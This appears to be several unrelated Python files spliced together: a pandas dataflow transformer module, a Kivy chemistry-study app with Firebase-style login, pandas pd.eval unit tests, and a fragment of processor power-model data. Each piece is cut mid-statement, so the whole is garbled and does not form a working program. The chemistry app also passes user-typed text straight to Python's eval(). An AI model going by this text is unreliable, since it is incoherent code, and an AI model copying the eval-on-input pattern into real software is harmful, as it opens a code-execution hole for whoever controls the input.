def transformed_col_names(self) -> List[str]:
dbg.dassert_is_not(
self._transformed_col_names,
None,
"No transformed column names. This may indicate "
"an invocation prior to graph execution.",
)
return self._transformed_col_names
def _transform(
self, df: pd.DataFrame
) -> Tuple[pd.DataFrame, collections.OrderedDict]:
df_in = df.copy()
df = df.copy()
if self._fit_cols is None:
self._fit_cols = df.columns.tolist() or self._cols
if self._cols is None:
dbg.dassert_set_eq(self._fit_cols, df.columns)
df = df[self._fit_cols]
idx = df.index
# Initialize container to store info (e.g., auxiliary stats) in the
# node.
info = collections.OrderedDict()
info["func_info"] = collections.OrderedDict()
func_info = info["func_info"]
srs_list = []
# NOTE: unlike SeriesToDfTransformer, this class never sets `_leaf_cols`;
# iterate over the columns selected above instead.
for col in df.columns:
srs, col_info = _apply_func_to_series(
df[col],
self._nan_mode,
self._transformer_func,
self._transformer_kwargs,
)
dbg.dassert_isinstance(srs, pd.Series)
srs.name = col
if col_info is not None:
func_info[col] = col_info
srs_list.append(srs)
info["func_info"] = func_info
df = pd.concat(srs_list, axis=1)
df = df.reindex(index=idx)
# TODO(Paul): Consider supporting the option of relaxing or
# foregoing this check.
dbg.dassert(
df.index.equals(df_in.index),
"Input/output indices differ but are expected to be the same!",
)
# Maybe merge transformed columns with a subset of input df columns.
df = self._apply_col_mode(
df_in,
df,
cols=df.columns.tolist(),
col_rename_func=None,
col_mode=self._col_mode,
)
#
info["df_transformed_info"] = cdu.get_df_info_as_string(df)
return df, info
class SeriesToDfTransformer(cdnb.Transformer):
"""
Wrap transformers using the `SeriesToDfColProcessor` pattern.
"""
def __init__(
self,
nid: str,
in_col_group: Tuple[_COL_TYPE],
out_col_group: Tuple[_COL_TYPE],
transformer_func: Callable[..., pd.Series],
transformer_kwargs: Optional[Dict[str, Any]] = None,
nan_mode: Optional[str] = None,
) -> None:
"""
For reference, let:
- N = df.columns.nlevels
- leaf_cols = df[in_col_group].columns
:param nid: unique node id
:param in_col_group: a group of cols specified by the first N - 1
levels
:param out_col_group: new output col group names. This specifies the
names of the first N - 1 levels. The leaf_cols names remain the
same.
:param transformer_func: srs -> srs
:param transformer_kwargs: transformer_func kwargs
:param nan_mode: `leave_unchanged` or `drop`. If `drop`, applies to
columns individually.
"""
super().__init__(nid)
dbg.dassert_isinstance(in_col_group, tuple)
dbg.dassert_isinstance(out_col_group, tuple)
self._in_col_group = in_col_group
self._out_col_group = out_col_group
self._transformer_func = transformer_func
self._transformer_kwargs = transformer_kwargs or {}
self._nan_mode = nan_mode or "leave_unchanged"
# The leaf col names are determined from the dataframe at runtime.
self._leaf_cols = None
def _transform(
self, df: pd.DataFrame
) -> Tuple[pd.DataFrame, collections.OrderedDict]:
# Preprocess to extract relevant flat dataframe.
df_in = df.copy()
df = cdnb.SeriesToDfColProcessor.preprocess(df, self._in_col_group)
# Apply `transform()` function column-wise.
self._leaf_cols = df.columns.tolist()
# Initialize container to store info (e.g., auxiliary stats) in the
# node.
info = collections.OrderedDict()
info["func_info"] = collections.OrderedDict()
func_info = info["func_info"]
dfs = {}
for col in self._leaf_cols:
df_out, col_info = _apply_func_to_series(
df[col],
self._nan_mode,
self._transformer_func,
self._transformer_kwargs,
)
dbg.dassert_isinstance(df_out, pd.DataFrame)
if col_info is not None:
func_info[col] = col_info
dfs[col] = df_out
info["func_info"] = func_info
# Combine the series representing leaf col transformations back into a
# single dataframe.
df = cdnb.SeriesToDfColProcessor.postprocess(dfs, self._out_col_group)
df = cdu.merge_dataframes(df_in, df)
info["df_transformed_info"] = cdu.get_df_info_as_string(df)
return df, info
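# Construction sketch (hedged): the group names and `some_srs_to_df_func`
# below are illustrative assumptions. Given two-level columns such as
# ("close", "MN0"), ("close", "MN1"), ..., a per-instrument srs -> df
# feature extractor could be wrapped as
#
#     node = SeriesToDfTransformer(
#         nid="featurize",
#         in_col_group=("close",),        # first N - 1 levels of the input cols
#         out_col_group=("close_feat",),  # first N - 1 levels of the output cols
#         transformer_func=some_srs_to_df_func,
#     )
#
# Each leaf column (e.g. "MN0") is transformed independently and the results
# are recombined under the new "close_feat" group.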
class SeriesToSeriesTransformer(cdnb.Transformer):
"""
Wrap transformers using the `SeriesToSeriesColProcessor` pattern.
When operating on multiple columns, this applies the transformer function
one series at a time. Additionally, NaN-handling is performed "locally"
(one series at a time, without regard to NaNs in other columns).
Example: df like
close vol
MN0 MN1 MN2 MN3 MN0 MN1 MN2 MN3
2010-01-04 10:30:00 -2.62 8.81 14.93 -0.88 100.0 100.0 100.0 100.0
2010-01-04 11:00:00 -2.09 8.27 16.75 -0.92 100.0 100.0 100.0 100.0
2010-01-04 11:30:00 -2.52 6.97 12.56 -1.52 100.0 100.0 100.0 100.0
2010-01-04 12:00:00 -2.54 5.30 8.90 -1.54 100.0 100.0 100.0 100.0
2010-01-04 12:30:00 -1.91 2.02 4.65 -1.77 100.0 100.0 100.0 100.0
Then, e.g., to calculate, returns, we could take
- `in_col_group = "close",`
- `out_col_group = "ret_0",`
Notice that the trailing comma makes these tuples.
The transformer_func and `nan_mode` would operate on the price columns
individually and return one return column per price column, e.g.,
generating
ret_0 close vol
MN0
# File: ActualApp/Wireframe/main.py
from DataStorage import Authentication, Database
from kivy.app import App
from kivy.lang.builder import Builder
from kivy.uix.screenmanager import Screen, NoTransition
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.uix.gridlayout import GridLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.core.text.markup import MarkupLabel
from kivy.core.window import Window
from kivy.core.text import LabelBase
import json
import Elements as elements
# all of the screens
class Login(Screen):
pass
class ForgotPassword(Screen):
pass
class SignupStudentOrTeacher(Screen):
pass
class SignupStudent(Screen):
pass
class SignupTeacher(Screen):
pass
class HomePageStudent(Screen):
pass
class HomePageStudentMolarTab(Screen):
pass
class HomePageTeacher(Screen):
pass
class SearchElement(Screen):
pass
class BalancingEquations(Screen):
pass
class MolarCalculator(Screen):
pass
class AcidBase(Screen):
pass
class CalculateFormula(Screen):
pass
class LewisStructure(Screen):
pass
# Some Helpful Methods
def process_error_message(error_message):
error_message = error_message.split("_")
return_message = ""
for message in error_message:
return_message += message.capitalize() + " "
return return_message
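# e.g. process_error_message("EMAIL_NOT_FOUND") returns "Email Not Found "
# (note the trailing space added after the last word).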
def process_message(messages: str, key=True):
returned_message = ""
if key:
messages = messages.split("_")
for index, message in enumerate(messages):
if len(messages) - 1 != index:
returned_message += message.capitalize() + "\n"
else:
returned_message += message.capitalize()
else:
for index, message in enumerate(messages):
message = str(message)
if index % 2 == 0:
returned_message += "\n"
returned_message += message + ", "
print(message)
returned_message = returned_message.rstrip(", ")
return returned_message
# All of the fonts
Cabin_Sketch_Dir = "Fonts/Cabin_Sketch/"
Open_Sans_Dir = "Fonts/Open_Sans/"
LabelBase.register(name="Cabin Sketch", fn_regular=f"{Cabin_Sketch_Dir}CabinSketch-Regular.ttf")
LabelBase.register(name="Open Sans Light", fn_regular=f"{Open_Sans_Dir}OpenSans-Light.ttf")
LabelBase.register(name="Open Sans", fn_regular=f"{Open_Sans_Dir}OpenSans-Regular.ttf",
fn_bold=f"{Open_Sans_Dir}OpenSans-ExtraBold.ttf")
kv = Builder.load_file("kv/main.kv")
class MainApp(App):
error_messages = ["INVALID_EMAIL", "INVALID_PASSWORD", "WEAK_PASSWORD : Password should be at least 6 <PASSWORD>",
"EMAIL_EXISTS", "EMAIL_NOT_FOUND"]
can_change_screen = True
screen_manager = "screen_manager"
forgot_password_popup = None
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.local_id = None
self.SUB = str.maketrans("0123456789", "₀₁₂₃₄₅₆₇₈₉")
self.SUP = str.maketrans("0123456789", "⁰¹²³⁴⁵⁶⁷⁸⁹")
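# e.g. "C6H12O6".translate(self.SUB) -> "C₆H₁₂O₆" and
# "23".translate(self.SUP) -> "²³"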
def build(self):
Window.size = (1080, 2050) # 1080, 2050
return kv
# changes the current screen to another screen if a button was pressed.
def change_screen(self, screen_name):
screen_manager = self.root.ids["screen_manager"]
screen_manager.transition = NoTransition()
try:
error_text = self.root.ids[screen_name].ids["error_text"]
error_text.text = ""
except Exception as e:
print("No text available")
if screen_manager.current == "signup_student":
self.sign_up_for_students()
if self.can_change_screen:
screen_manager.current = screen_name
print(screen_manager.current)
def back_button(self, screen_name, change_screen: bool):
screen_manager = self.root.ids["screen_manager"]
screen_manager.transition = NoTransition()
if change_screen:
screen_manager.current = screen_name
self.can_change_screen = True
print(screen_manager.current)
# Popup window method
def show_popup(self):
self.forgot_password_popup = ForgotPassword()
popup_window = Popup(title="Chem Hero", content=self.forgot_password_popup,
size_hint=(0.8333333333333334, 0.43902439024390244))
popup_window.open()
# student sign up
def sign_up_for_students(self):
sign_up_student_screen = self.root.ids["signup_student"]
email = sign_up_student_screen.ids["student_email_signup"]
password = sign_up_student_screen.ids["<PASSWORD>"]
name = sign_up_student_screen.ids["name"]
dob = sign_up_student_screen.ids["DOB"]
username = sign_up_student_screen.ids["username"]
error_text = sign_up_student_screen.ids["error_text"]
# the authentication process
auth = Authentication()
local_id = auth.signup(email.text, password.text)
if email.text == "" or password.text == "" or name.text == "" or dob == "" or username == "":
error_text.text = "Missing Inputs"
self.can_change_screen = False
elif local_id in self.error_messages:
error_text.text = process_error_message(local_id)
self.can_change_screen = False
else:
# the data
data = {"Occupation": "Student", "name": name.text,
"Date of Birth": dob.text, "Username": username.text,
"Email": email.text}
# the database storing process
database = Database.db
database.child("Users").child(local_id).set(data)
email.text = ""
password.text = ""
self.can_change_screen = True
# method used to sign in
def sign_in(self):
login_screen = self.root.ids["login_screen"]
email = login_screen.ids["email_text"]
password = login_screen.ids["password_text"]
error_text = login_screen.ids["error_text"]
auth = Authentication()
ids = auth.sign_in(email.text, password.text)
self.local_id = ids[0]
if email.text == "" or password.text == "":
error_text.text = "Missing Inputs"
email.text = ""
password.text = ""
elif self.local_id in self.error_messages:
if self.local_id == "EMAIL_NOT_FOUND":
error_text.text = "Incorrect Inputs"
else:
error_text.text = process_error_message(self.local_id)
email.text = ""
password.text = ""
else:
database = Database.db
error_text.text = ""
email.text = ""
password.text = ""
home_page = ""
id_token = ids[1]
user_data = auth.get_user_data(id_token)
email_verified = Authentication.check_email_verified(user_data)
if email_verified:
occupation = Database.get_occupation(database, self.local_id, "Occupation", "Users")
if occupation == "Student":
home_page = "home_page_student"
#self.initial_settings("student")
elif occupation == "Teacher":
home_page = "home_page_teacher"
#self.initial_settings("teacher")
self.change_screen(home_page)
else:
error_text.text = "Email not Verified"
# sends an email link to reset the password
def send_email_to_reset_password(self):
email = self.forgot_password_popup.ids["email"]
error_text = self.forgot_password_popup.ids["error_text"]
auth = Authentication()
request = auth.reset_password(email.text)
data = json.loads(request.content.decode())
if not request.ok:
error_message = data["error"]["message"]
error_message = process_error_message(error_message)
error_text.text = error_message
else:
self.forgot_password_popup.clear_widgets()
self.forgot_password_popup.add_widget(Label(text="A link has been sent to your E-mail", size_hint=(1, 0.1),
pos_hint={"center_x": 0.5, "center_y": 0.5},
font_name="Open Sans", font_size="16dp"))
email.text = ""
# show the properties of the elements
def show_element_property(self):
homepage_student = self.root.ids["search_element"]
scroll_view_gridlayout = homepage_student.ids["searching_table"] # the gridlayout
search_text = homepage_student.ids["search_text"] # the input box
dictionary_of_elements = elements.get_elements()
dict_of_symbols = elements.symbol_element_name_key_pair()
scroll_view_gridlayout.clear_widgets()
print(dictionary_of_elements)
print(dict_of_symbols)
# TODO make the information more viewable
if search_text.text.capitalize() in dictionary_of_elements:
element = dictionary_of_elements[search_text.text.capitalize()]
for key, value in element.items():
if key in ["source", "spectral_img", "xpos", "ypos", "shells", "summary", "ionization_energies",
"appearance", "electron_configuration"]:
continue
if key == "density":
value = f"{value} g/L"
if isinstance(value, str) and key != "discovered_by" and key != "named_by":
value = value.capitalize()
scroll_view_gridlayout.add_widget(Label(text=str(process_message(key)), color=(0, 0, 0, 1)))
scroll_view_gridlayout.add_widget(Label(text=str(value), color=(0, 0, 0, 1)))
elif search_text.text.capitalize() in dict_of_symbols:
element = dict_of_symbols[search_text.text.capitalize()]
element_information = dictionary_of_elements[element]
for key, value in element_information.items():
if key in ["source", "spectral_img", "xpos", "ypos", "shells", "summary", "ionization_energies",
"appearance", "electron_configuration"]:
continue
if isinstance(value, str) and key != "discovered_by" and key != "named_by":
value = value.capitalize()
if key == "density":
value = f"{value} g/L"
scroll_view_gridlayout.add_widget(Label(text=str(process_message(key)), color=(0, 0, 0, 1)))
scroll_view_gridlayout.add_widget(Label(text=str(value), color=(0, 0, 0, 1)))
elif search_text.text == "":
pass
else:
scroll_view_gridlayout.add_widget(Label(text="Invalid Search",
font_name="Open Sans",
font_size="26dp",
color=(0, 0, 0, 1)))
# calculate the molar mass
def calculate_molar_mass(self):
home_page_student = self.root.ids["molar_calculator"]
scroll_calculation_text = home_page_student.ids["calculation_text"]
chemical_formula_text = home_page_student.ids["chemical_formula_text"]
molar_mass = elements.MolarMass(chemical_formula_text.text)
if molar_mass.molar_mass <= 0:
answer = f"Compound [b]{chemical_formula_text.text}[/b] is invalid"
scroll_calculation_text.text = answer
else:
answer = f"[b]Compound[/b]: {molar_mass}\n[b]Element Frequency[/b]: \n"
print(molar_mass)
for element, frequency in molar_mass.element_frequencies.items():
answer += f"{element}: {frequency} \n"
answer += "\n[b]Relative Masses and Percent[/b]:\n"
for element, information in molar_mass.element_composition.items():
answer += f"[u]Total mass of {element}[/u]: {information[0]} g\n"
answer += f"[u]Percent composition of {element}[/u]: " \
f"{round(information[1] * 100, 1)}%\n\n"
answer += f"[b]Total mass[/b]: {molar_mass.molar_mass} g"
scroll_calculation_text.text = answer + "\n\n\n"
scroll_calculation_text.text += "[b]Calculations[/b]\n" + molar_mass.show_calculation()
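# Worked example (hedged, rounded atomic masses): for "H2O" the element
# frequencies are H: 2 and O: 1, so the molar mass is about
# 2 * 1.008 + 15.999 ≈ 18.02 g, i.e. roughly 11.2% H and 88.8% O by mass.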
# calculate the empirical or molecular formula based on percent composition and abundance
def calculate_formula(self):
# TODO take in formula names and symbol
home_page_screen = self.root.ids["calculate_formula"]
element_list_text = home_page_screen.ids["element_list_text"]
percent_list_text = home_page_screen.ids["percent_list_text"]
mass = home_page_screen.ids["mass"]
calculate_formula_scroll_view = home_page_screen.ids["calculate_formula_scroll_view"]
calculate_formula_scroll_view.text = ""
percentage_contains_string = False
there_is_mass = False
try:
if isinstance(eval(mass.text), (int, float)):  # if the mass entered is actually a number
there_is_mass = True
except:
there_is_mass = False
element_list = element_list_text.text.replace(" ", "").split(",")
init_percent_list = percent_list_text.text.replace(" ", "").split(",")
term_percent_list = []
if element_list_text.text == "" or percent_list_text.text == "":
calculate_formula_scroll_view.text = "Missing Inputs"
elif len(init_percent_list) > 0:
for percent in init_percent_list:
try:
if percent[-1] == "%":
percent = float(percent.strip("%")) / 100
term_percent_list.append(percent)
elif isinstance(eval(percent), float) or isinstance(eval(percent), int):
term_percent_list.append(eval(percent))
else:
calculate_formula_scroll_view.text = "Invalid Percentage Values."
break
except:
percentage_contains_string = True
break
if percentage_contains_string:
calculate_formula_scroll_view.text = "Percentage Values contains characters."
elif sum(term_percent_list) != 1:
calculate_formula_scroll_view.text = "Given percentages does not add up to 100%."
else:
if there_is_mass:
percent_comp_obj = elements.PercentComp(element_list, term_percent_list, eval(mass.text))
empirical_formula = percent_comp_obj.empirical_formula_markup
molecular_formula = elements.MolarMass(percent_comp_obj.molecular_formula)
moles = percent_comp_obj.empirical_formula[1]
for element, mole in moles.items():
calculate_formula_scroll_view.text += f"The molecule contains {round(mole)} moles of {element}\n"
calculate_formula_scroll_view.text += f"The empirical formula would be: {empirical_formula}"
calculate_formula_scroll_view.text += f"The molecular formula would be: {molecular_formula}"
else:
percent_comp_obj = elements.PercentComp(element_list, term_percent_list)
empirical_formula = percent_comp_obj.empirical_formula_markup
moles = percent_comp_obj.empirical_formula[1]
for element, mole in moles.items():
calculate_formula_scroll_view.text += f"The molecule contains {round(mole)} moles of {element}\n"
calculate_formula_scroll_view.text += f"The empirical formula would be: {empirical_formula}"
else:
calculate_formula_scroll_view.text = "No percentages are given."
# balance an equation
def balance_equation(self):
homepage = self.root.ids["balancing_equations"]
reactant_list = homepage.ids["reactant_list"].text
product_list = homepage.ids["product_list"].text
scroll_view_text = homepage.ids["balance_equation_scroll_view"]
# Check if the entries are valid
reactants = reactant_list.replace(" ", "").split(",")
products = product_list.replace(" ", "").split(",")
invalid = False
for reactant in reactants:
molar_mass = elements.MolarMass(reactant)
if molar_mass.molar_mass <= 0:
invalid = True
break
for product in products:
if invalid:
break
else:
molar_mass2 = elements.MolarMass(product)
if molar_mass2.molar_mass <= 0:
invalid = True
break
print(reactants, products)
if reactants[0] == "" or products[0] == "":
scroll_view_text.text = f"Missing Inputs"
elif invalid:
scroll_view_text.text = f"Invalid Input"
else:
balanced_equation = elements.EquationBalance(reactant_list, product_list)
scroll_view_text.text = f"The balanced equation is {balanced_equation.balance_equation()}"
# method to update user setting
def initial_settings(self, occupation: str):
homepage = self.root.ids["home_page_student"]
if occupation == "student":
name = homepage.ids["name"]
dob = homepage.ids["DOB"]
username = homepage.ids["username"]
email = homepage.ids["email"]
status = homepage.ids["status"]
name.text = Database.get_occupation(Database.db, local_id=self.local_id, key="name", folder="Users")
dob.text = Database.get_occupation(Database.db, local_id=self.local_id, key="Date of Birth", folder="Users")
username.text = Database.get_occupation(Database.db, local_id=self.local_id, key="Username", folder="Users")
email.text = Database.get_occupation(Database.db, local_id=self.local_id, key="Email", folder="Users")
status.text = Database.get_occupation(Database.db,
parser=parser)
tm.assert_frame_equal(res, df < 2)
df3 = DataFrame(np.random.randn(*df.shape), index=df.index, columns=df.columns)
res = pd.eval("df < df3", engine=engine, parser=parser)
tm.assert_frame_equal(res, df < df3)
@pytest.mark.parametrize("r1", lhs_index_types)
@pytest.mark.parametrize("c1", index_types)
@pytest.mark.parametrize("r2", index_types)
@pytest.mark.parametrize("c2", index_types)
def test_medium_complex_frame_alignment(self, engine, parser, r1, c1, r2, c2):
with warnings.catch_warnings(record=True):
warnings.simplefilter("always", RuntimeWarning)
df = tm.makeCustomDataframe(
3, 2, data_gen_f=f, r_idx_type=r1, c_idx_type=c1
)
df2 = tm.makeCustomDataframe(
4, 2, data_gen_f=f, r_idx_type=r2, c_idx_type=c2
)
df3 = tm.makeCustomDataframe(
5, 2, data_gen_f=f, r_idx_type=r2, c_idx_type=c2
)
if should_warn(df.index, df2.index, df3.index):
with tm.assert_produces_warning(RuntimeWarning):
res = pd.eval("df + df2 + df3", engine=engine, parser=parser)
else:
res = pd.eval("df + df2 + df3", engine=engine, parser=parser)
tm.assert_frame_equal(res, df + df2 + df3)
@pytest.mark.parametrize("index_name", ["index", "columns"])
@pytest.mark.parametrize("c_idx_type", index_types)
@pytest.mark.parametrize("r_idx_type", lhs_index_types)
def test_basic_frame_series_alignment(
self, engine, parser, index_name, r_idx_type, c_idx_type
):
def testit(r_idx_type, c_idx_type, index_name):
df = tm.makeCustomDataframe(
10, 10, data_gen_f=f, r_idx_type=r_idx_type, c_idx_type=c_idx_type
)
index = getattr(df, index_name)
s = Series(np.random.randn(5), index[:5])
if should_warn(df.index, s.index):
with tm.assert_produces_warning(RuntimeWarning):
res = pd.eval("df + s", engine=engine, parser=parser)
else:
res = pd.eval("df + s", engine=engine, parser=parser)
if r_idx_type == "dt" or c_idx_type == "dt":
expected = df.add(s) if engine == "numexpr" else df + s
else:
expected = df + s
tm.assert_frame_equal(res, expected)
with warnings.catch_warnings(record=True):
warnings.simplefilter("always", RuntimeWarning)
testit(r_idx_type, c_idx_type, index_name)
@pytest.mark.parametrize("index_name", ["index", "columns"])
def test_basic_series_frame_alignment(self, engine, parser, index_name):
def testit(r_idx_type, c_idx_type, index_name):
df = tm.makeCustomDataframe(
10, 7, data_gen_f=f, r_idx_type=r_idx_type, c_idx_type=c_idx_type
)
index = getattr(df, index_name)
s = Series(np.random.randn(5), index[:5])
if should_warn(s.index, df.index):
with tm.assert_produces_warning(RuntimeWarning):
res = pd.eval("s + df", engine=engine, parser=parser)
else:
res = pd.eval("s + df", engine=engine, parser=parser)
if r_idx_type == "dt" or c_idx_type == "dt":
expected = df.add(s) if engine == "numexpr" else s + df
else:
expected = s + df
tm.assert_frame_equal(res, expected)
# only test dt with dt, otherwise weird joins result
args = product(["i", "u", "s"], ["i", "u", "s"])
with warnings.catch_warnings(record=True):
# avoid warning about comparing strings and ints
warnings.simplefilter("ignore", RuntimeWarning)
for r_idx_type, c_idx_type in args:
testit(r_idx_type, c_idx_type, index_name)
# dt with dt
args = product(["dt"], ["dt"])
with warnings.catch_warnings(record=True):
# avoid warning about comparing strings and ints
warnings.simplefilter("ignore", RuntimeWarning)
for r_idx_type, c_idx_type in args:
testit(r_idx_type, c_idx_type, index_name)
@pytest.mark.parametrize("c_idx_type", index_types)
@pytest.mark.parametrize("r_idx_type", lhs_index_types)
@pytest.mark.parametrize("index_name", ["index", "columns"])
@pytest.mark.parametrize("op", ["+", "*"])
def test_series_frame_commutativity(
self, engine, parser, index_name, op, r_idx_type, c_idx_type
):
with warnings.catch_warnings(record=True):
warnings.simplefilter("always", RuntimeWarning)
df = tm.makeCustomDataframe(
10, 10, data_gen_f=f, r_idx_type=r_idx_type, c_idx_type=c_idx_type
)
index = getattr(df, index_name)
s = Series(np.random.randn(5), index[:5])
lhs = f"s {op} df"
rhs = f"df {op} s"
if should_warn(df.index, s.index):
with tm.assert_produces_warning(RuntimeWarning):
a = pd.eval(lhs, engine=engine, parser=parser)
with tm.assert_produces_warning(RuntimeWarning):
b = pd.eval(rhs, engine=engine, parser=parser)
else:
a = pd.eval(lhs, engine=engine, parser=parser)
b = pd.eval(rhs, engine=engine, parser=parser)
if r_idx_type != "dt" and c_idx_type != "dt":
if engine == "numexpr":
tm.assert_frame_equal(a, b)
@pytest.mark.parametrize("r1", lhs_index_types)
@pytest.mark.parametrize("c1", index_types)
@pytest.mark.parametrize("r2", index_types)
@pytest.mark.parametrize("c2", index_types)
def test_complex_series_frame_alignment(self, engine, parser, r1, c1, r2, c2):
import random
n = 3
m1 = 5
m2 = 2 * m1
with warnings.catch_warnings(record=True):
warnings.simplefilter("always", RuntimeWarning)
index_name = random.choice(["index", "columns"])
obj_name = random.choice(["df", "df2"])
df = tm.makeCustomDataframe(
m1, n, data_gen_f=f, r_idx_type=r1, c_idx_type=c1
)
df2 = tm.makeCustomDataframe(
m2, n, data_gen_f=f, r_idx_type=r2, c_idx_type=c2
)
index = getattr(locals().get(obj_name), index_name)
ser = Series(np.random.randn(n), index[:n])
if r2 == "dt" or c2 == "dt":
if engine == "numexpr":
expected2 = df2.add(ser)
else:
expected2 = df2 + ser
else:
expected2 = df2 + ser
if r1 == "dt" or c1 == "dt":
if engine == "numexpr":
expected = expected2.add(df)
else:
expected = expected2 + df
else:
expected = expected2 + df
if should_warn(df2.index, ser.index, df.index):
with tm.assert_produces_warning(RuntimeWarning):
res = pd.eval("df2 + ser + df", engine=engine, parser=parser)
else:
res = pd.eval("df2 + ser + df", engine=engine, parser=parser)
assert res.shape == expected.shape
tm.assert_frame_equal(res, expected)
def test_performance_warning_for_poor_alignment(self, engine, parser):
df = DataFrame(np.random.randn(1000, 10))
s = Series(np.random.randn(10000))
if engine == "numexpr":
seen = PerformanceWarning
else:
seen = False
with tm.assert_produces_warning(seen):
pd.eval("df + s", engine=engine, parser=parser)
s = Series(np.random.randn(1000))
with tm.assert_produces_warning(False):
pd.eval("df + s", engine=engine, parser=parser)
df = DataFrame(np.random.randn(10, 10000))
s = Series(np.random.randn(10000))
with tm.assert_produces_warning(False):
pd.eval("df + s", engine=engine, parser=parser)
df = DataFrame(np.random.randn(10, 10))
s = Series(np.random.randn(10000))
is_python_engine = engine == "python"
if not is_python_engine:
wrn = PerformanceWarning
else:
wrn = False
with tm.assert_produces_warning(wrn) as w:
pd.eval("df + s", engine=engine, parser=parser)
if not is_python_engine:
assert len(w) == 1
msg = str(w[0].message)
logged = np.log10(s.size - df.shape[1])
expected = (
f"Alignment difference on axis 1 is larger "
f"than an order of magnitude on term 'df', "
f"by more than {logged:.4g}; performance may suffer"
)
assert msg == expected
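# For this setup np.log10(10000 - 10) ≈ 3.9996, i.e. the Series is about
# four orders of magnitude longer than the frame's axis 1.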
# ------------------------------------
# Slightly more complex ops
@td.skip_if_no_ne
class TestOperationsNumExprPandas:
exclude_arith: list[str] = []
engine = "numexpr"
parser = "pandas"
@classmethod
def setup_class(cls):
cls.arith_ops = [
op
for op in expr.ARITH_OPS_SYMS + expr.CMP_OPS_SYMS
if op not in cls.exclude_arith
]
def eval(self, *args, **kwargs):
kwargs["engine"] = self.engine
kwargs["parser"] = self.parser
kwargs["level"] = kwargs.pop("level", 0) + 1
return pd.eval(*args, **kwargs)
def test_simple_arith_ops(self):
ops = (op for op in self.arith_ops if op != "//")
for op in ops:
ex = f"1 {op} 1"
ex2 = f"x {op} 1"
ex3 = f"1 {op} (x + 1)"
if op in ("in", "not in"):
msg = "argument of type 'int' is not iterable"
with pytest.raises(TypeError, match=msg):
pd.eval(ex, engine=self.engine, parser=self.parser)
else:
expec = _eval_single_bin(1, op, 1, self.engine)
x = self.eval(ex, engine=self.engine, parser=self.parser)
assert x == expec
expec = _eval_single_bin(x, op, 1, self.engine)
y = self.eval(
ex2, local_dict={"x": x}, engine=self.engine, parser=self.parser
)
assert y == expec
expec = _eval_single_bin(1, op, x + 1, self.engine)
y = self.eval(
ex3, local_dict={"x": x}, engine=self.engine, parser=self.parser
)
assert y == expec
@pytest.mark.parametrize("rhs", [True, False])
@pytest.mark.parametrize("lhs", [True, False])
@pytest.mark.parametrize("op", expr.BOOL_OPS_SYMS)
def test_simple_bool_ops(self, rhs, lhs, op):
ex = f"{lhs} {op} {rhs}"
res = self.eval(ex)
exp = eval(ex)
assert res == exp
@pytest.mark.parametrize("rhs", [True, False])
@pytest.mark.parametrize("lhs", [True, False])
@pytest.mark.parametrize("op", expr.BOOL_OPS_SYMS)
def test_bool_ops_with_constants(self, rhs, lhs, op):
ex = f"{lhs} {op} {rhs}"
res = self.eval(ex)
exp = eval(ex)
assert res == exp
def test_4d_ndarray_fails(self):
x = np.random.randn(3, 4, 5, 6)
y = Series(np.random.randn(10))
msg = "N-dimensional objects, where N > 2, are not supported with eval"
with pytest.raises(NotImplementedError, match=msg):
self.eval("x + y", local_dict={"x": x, "y": y})
def test_constant(self):
x = self.eval("1")
assert x == 1
def test_single_variable(self):
df = DataFrame(np.random.randn(10, 2))
df2 = self.eval("df", local_dict={"df": df})
tm.assert_frame_equal(df, df2)
def test_truediv(self):
s = np.array([1])
ex = "s / 1"
d = {"s": s} # noqa
# FutureWarning: The `truediv` parameter in pd.eval is deprecated and will be
# removed in a future version.
with tm.assert_produces_warning(FutureWarning):
res = self.eval(ex, truediv=False)
tm.assert_numpy_array_equal(res, np.array([1.0]))
with tm.assert_produces_warning(FutureWarning):
res = self.eval(ex, truediv=True)
tm.assert_numpy_array_equal(res, np.array([1.0]))
with tm.assert_produces_warning(FutureWarning):
res = self.eval("1 / 2", truediv=True)
expec = 0.5
assert res == expec
with tm.assert_produces_warning(FutureWarning):
res = self.eval("1 / 2", truediv=False)
expec = 0.5
assert res == expec
with tm.assert_produces_warning(FutureWarning):
res = self.eval("s / 2", truediv=False)
expec = 0.5
assert res == expec
with tm.assert_produces_warning(FutureWarning):
res = self.eval("s / 2", truediv=True)
expec = 0.5
assert res == expec
def test_failing_subscript_with_name_error(self):
df = DataFrame(np.random.randn(5, 3)) # noqa
with pytest.raises(NameError, match="name 'x' is not defined"):
self.eval("df[x > 2] > 2")
def test_lhs_expression_subscript(self):
df = DataFrame(np.random.randn(5, 3))
result = self.eval("(df + 1)[df > 2]", local_dict={"df": df})
expected = (df + 1)[df > 2]
tm.assert_frame_equal(result, expected)
def test_attr_expression(self):
df = DataFrame(np.random.randn(5, 3), columns=list("abc"))
expr1 = "df.a < df.b"
expec1 = df.a < df.b
expr2 = "df.a + df.b + df.c"
expec2 = df.a + df.b + df.c
expr3 = "df.a + df.b + df.c[df.b < 0]"
expec3 = df.a + df.b + df.c[df.b < 0]
exprs = expr1, expr2, expr3
expecs = expec1, expec2, expec3
for e, expec in zip(exprs, expecs):
tm.assert_series_equal(expec, self.eval(e, local_dict={"df": df}))
def test_assignment_fails(self):
df = DataFrame(np.random.randn(5, 3), columns=list("abc"))
df2 = DataFrame(np.random.randn(5, 3))
expr1 = "df = df2"
msg = "cannot assign without a target object"
with pytest.raises(ValueError, match=msg):
self.eval(expr1, local_dict={"df": df, "df2": df2})
def test_assignment_column(self):
df = DataFrame(np.random.randn(5, 2), columns=list("ab"))
orig_df = df.copy()
# multiple assignees
with pytest.raises(SyntaxError, match="invalid syntax"):
df.eval("d c = a + b")
# invalid assignees
msg = "left hand side of an assignment must be a single name"
with
Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.228261,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 5.76856,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
